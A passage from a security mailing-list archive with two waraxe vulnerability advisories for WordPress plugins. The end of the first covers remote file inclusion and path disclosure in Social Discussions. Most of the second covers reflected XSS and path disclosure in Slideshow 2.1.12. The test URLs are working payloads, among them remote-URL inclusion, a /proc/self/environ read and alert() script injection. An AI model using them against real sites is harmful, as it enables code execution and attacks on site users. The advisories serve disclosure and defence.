1. Remote File Inclusion in "social-discussions-networkpub_ajax.php"
###
Reasons: Uninitialized variable "$HTTP_ENV_VARS"
Attack vectors: User-supplied parameter "HTTP_ENV_VARS"
Preconditions:
1. register_globals=on
2. register_long_arrays=off
3. allow_url_include=on for RFI if PHP >= 5.2.0
4. PHP must be < 5.3.4 for LFI null-byte attacks
5. magic_quotes_gpc=off for LFI null-byte attacks
Php script "social-discussions-networkpub_ajax.php" line 2:
[ source code start ]--
if (!function_exists('add_action')){
@include_once($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php");
[ source code end ]
We can see, that script expects old-style array "HTTP_ENV_VARS" to be
initialized
and containing "DOCUMENT_ROOT" entry. But it appears, that if PHP directive
"register_long_arrays=off", then "HTTP_ENV_VARS" is uninitialized and if in
same time "register_globals=on", it is possible to fill that array with any
value, leading to the RFI (Remote File Inclusion) vulnerability.
Tests:
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/?
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z
###
2. Full Path Disclosure in multiple scripts
###
Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message
Tests:
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php
Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php
on line 2
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php
Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php
on line 2
http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php
Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php
on line 3
Contact:
~~~
come2war...@yahoo.com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
-- [ EOF ]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [waraxe-2012-SA#092] - Multiple Vulnerabilities in Wordpress Slideshow Plugin
[waraxe-2012-SA#092] - Multiple Vulnerabilities in Wordpress Slideshow Plugin === Author: Janek Vind "waraxe" Date: 17. October 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-92.html Description of vulnerable target: ~~~ Slideshow provides an easy way to integrate a slideshow for any WordPress installation. Any image can be loaded into the slideshow by picking it from the WordPress media page, even images you've already uploaded can be inserted into your slideshow right away! http://wordpress.org/extend/plugins/slideshow-jquery-image-gallery/ Affected version: 2.1.12 ### 1. Reflected XSS in "views/SlideshowPlugin/slideshow.php" ### Reasons: 1. Uninitialized variables "$randomId", "$slides" and "$settings" 2. Improper encoding or escaping of output Attack vectors: User-supplied parameters "randomId", "slides" and "settings" Preconditions: PHP directive register_globals=on Tests: http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=";>alert(123); http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=alert(123); http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?settings= ### 2. Reflected XSS in "views/SlideshowPluginPostType/settings.php" ### Reasons: 1. Uninitialized variables "$settings" and "$inputFields" 2. Improper encoding or escaping of output Attack vectors: User-supplied parameters "settings" and "inputFields" Preconditions: PHP directive register_globals=on Tests: http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=alert(123); http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[0][]&inputFields[0]=alert(123); ### 3. Reflected XSS in "views/SlideshowPluginPostType/style-settings.php" ### Reasons: 1. Uninitialized variables "$settings" and "$inputFields" 2. Improper encoding or escaping of output Attack vectors: User-supplied parameters "settings" and "inputFields" Preconditions: PHP directive register_globals=on Tests: http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0][3]=alert(123); http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=alert(123); ### 4. Full Path Disclosure in multiple scripts ### Reasons: Direct request to php script triggers pathname leak in error message Preconditions: PHP directive display_errors=on Result: Information Exposure Through an Error Message Tests: http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/slideshow.php Fatal error: Call to undefined function add_action() in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\slideshow.php on line 34 http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/classes/SlideshowPluginWidget.php Fatal error: Class 'WP_Widget' not found in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\classes\SlideshowPluginWidget.php on line 8 http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php Fatal error: Class 'SlideshowPluginMain' not found in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPlugin\slideshow.php on line 111 http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/information.php Fatal error: Call to undefined function _e() in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\information.php on line 1 http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/Slides
